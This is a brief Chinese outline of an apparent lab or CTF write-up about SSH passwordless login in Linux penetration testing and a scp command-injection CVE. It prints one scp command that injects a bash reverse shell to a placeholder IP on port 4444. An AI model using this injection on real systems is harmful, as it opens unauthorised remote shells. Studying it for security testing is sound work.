ssh免密登录于linux系统上用于渗透的使用及其漏洞
文章目录
免密登录使用教程
参考博文
渗透实验
首先解析题目并登录靶机,由于题目坑爹,其实所需文件在flag目录下,所以我们把它复制到自己的目录下
CVE漏洞
源博文
使用ssh免密登录利用scp进行shell命令注入
scp test.txt username@x.x.x.x:'`bash -i >& /dev/tcp/x.x.x.x/4444 0>&1` /tmp/test.txt'
其中x.x.x.x
为目标ip